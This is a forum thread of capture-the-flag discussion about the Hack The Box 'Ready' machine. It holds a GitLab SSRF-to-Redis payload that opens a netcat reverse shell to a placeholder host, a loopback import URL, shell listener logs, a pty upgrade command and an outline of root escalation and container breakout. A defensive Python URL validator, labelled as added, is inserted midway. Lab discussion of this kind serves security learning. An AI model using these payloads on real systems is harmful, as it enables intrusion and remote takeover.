TUTORIAL Ready User Part
by liveartic12 - December 12, 2020 at 10:55 PM
#13
(December 13, 2020 at 01:28 AM)xxxxxd Wrote:
(December 13, 2020 at 01:21 AM)Kali76 Wrote:
(December 13, 2020 at 01:07 AM)xxxxxd Wrote: you can simply use nc like
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash ***IP***  ***PORT*** \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec

Doesn't work ... Response --

HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: Sun, 13 Dec 2020 00:19:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2936
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-Request-Id: 2b9bc018-b0c8-4fb4-860b-80c4ae76afee
X-Runtime: 0.019574

422 Unprocessable Entity says that your request is not in a correct format.

-> new project -> import project -> repo by url -> some name and this url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git -> intercept with burp and edit the request as shown here: https://github.com/jas502n/gitlab-SSRF-r...te-request
Can’t replicate this at all for some reason, strange.
#14
(December 13, 2020 at 11:39 AM)JustMeAndYou Wrote:
(December 13, 2020 at 01:28 AM)xxxxxd Wrote:
(December 13, 2020 at 01:21 AM)Kali76 Wrote:
(December 13, 2020 at 01:07 AM)xxxxxd Wrote: you can simply use nc like
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash ***IP***  ***PORT*** \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec

Doesn't work ... Response --

HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: Sun, 13 Dec 2020 00:19:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2936
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-Request-Id: 2b9bc018-b0c8-4fb4-860b-80c4ae76afee
X-Runtime: 0.019574

422 Unprocessable Entity says that your request is not in a correct format.

-> new project -> import project -> repo by url -> some name and this url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git -> intercept with burp and edit the request as shown here: https://github.com/jas502n/gitlab-SSRF-r...te-request
Can’t replicate this at all for some reason, strange.

Yes, neither can I. I am listening on my Docker with netcat but I do not get anything; something is wrong. Response ---

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Dec 2020 03:14:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, private, must-revalidate, no-store
Etag: W/"566a101f09634a379f862102aebae194"
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Request-Id: be7cf16c-f1f8-4370-928b-f5b849cc4143
X-Runtime: 0.102288
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Content-Length: 50705
#15
Don't forget to URL-encode it.
#16
Guys, you can do it without Burp; search for the LiveOverflow article. You can send the whole URL-encoded payload inside the URL field and get a shell!!!

https://liveoverflow.com/gitlab-11-4-7-r...-ctf-2018/
#17
Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
#18
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

/bin/sh doesn't work

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9
#19
1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)
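The root cause behind step 1 above is an import-URL validator that did not recognise the IPv4-mapped IPv6 spelling of loopback. The following is an added example of a defender-side check, not code from this thread or from GitLab; the scheme allow-list and the `resolve` hook are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed policy: schemes an "import repository by URL" feature may fetch.
ALLOWED_SCHEMES = {"http", "https", "git"}


def default_resolve(host):
    """Resolve a hostname to the set of address strings it currently points at."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_global_address(text):
    """True only if `text` is an IP literal routed on the public Internet.

    IPv4-mapped IPv6 literals such as 0:0:0:0:0:ffff:127.0.0.1 are unwrapped
    first, so the embedded 127.0.0.1 is judged as loopback instead of slipping
    past a check that only compared the string against "127.0.0.1".
    Raises ValueError if `text` is not an IP literal at all.
    """
    ip = ipaddress.ip_address(text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global


def validate_import_url(url, resolve=default_resolve):
    """Return (accepted, reason) for a user-supplied repository import URL."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # brackets around IPv6 literals are already stripped
    if not host:
        return False, "missing host"
    try:
        # Bare IP literal of either family: classify it directly.
        if not is_global_address(host):
            return False, f"address {host} is not globally routable"
        return True, "ok"
    except ValueError:
        pass  # not an IP literal; fall through to name resolution
    # Hostnames: every address the name resolves to must be public, otherwise a
    # name pointed at 127.0.0.1 or 10.x reaches the same internal service.
    for addr in resolve(host):
        if not is_global_address(addr):
            return False, f"{host} resolves to non-global address {addr}"
    return True, "ok"
```

The exact URL used in the thread is rejected because the literal unwraps to 127.0.0.1, while a public address or a name that resolves only to public addresses passes.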
#20
(December 13, 2020 at 01:11 PM)Kali76 Wrote:
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

/bin/sh doesn't work

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done, but ls won't work there because there are no files or folders there

Try other commands:
whoami and more...
lmao, you got a shell and only tried the ls command there xD
#21
(December 13, 2020 at 06:15 PM)0xvijay Wrote:
(December 13, 2020 at 01:11 PM)Kali76 Wrote:
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

/bin/sh doesn't work

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done, but ls won't work there because there are no files or folders there

Try other commands:
whoami and more...
lmao, you got a shell and only tried the ls command there xD

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
#22
(December 13, 2020 at 07:00 PM)Kali76 Wrote:
(December 13, 2020 at 06:15 PM)0xvijay Wrote:
(December 13, 2020 at 01:11 PM)Kali76 Wrote:
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

/bin/sh doesn't work

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done, but ls won't work there because there are no files or folders there

Try other commands:
whoami and more...
lmao, you got a shell and only tried the ls command there xD

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git

python3 -c "import pty;pty.spawn('/bin/bash')";

run this there
#23
(December 13, 2020 at 07:05 PM)0xvijay Wrote:
(December 13, 2020 at 07:00 PM)Kali76 Wrote:
(December 13, 2020 at 06:15 PM)0xvijay Wrote:
(December 13, 2020 at 01:11 PM)Kali76 Wrote:
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

/bin/sh doesn't work

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done, but ls won't work there because there are no files or folders there

Try other commands:
whoami and more...
lmao, you got a shell and only tried the ls command there xD

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git

python3 -c "import pty;pty.spawn('/bin/bash')";

run this there

I don't have a shell, how do I launch it?
#24
(December 13, 2020 at 07:09 PM)Kali76 Wrote:
(December 13, 2020 at 07:05 PM)0xvijay Wrote:
(December 13, 2020 at 07:00 PM)Kali76 Wrote:
(December 13, 2020 at 06:15 PM)0xvijay Wrote:
(December 13, 2020 at 01:11 PM)Kali76 Wrote: /bin/sh doesn't work

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done, but ls won't work there because there are no files or folders there

Try other commands:
whoami and more...
lmao, you got a shell and only tried the ls command there xD

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git

python3 -c "import pty;pty.spawn('/bin/bash')";

run this there

I don't have a shell, how do I launch it?

You can run it because you got connected lmao

OK, wait, I'll make a detailed writeup for you soon for user + root
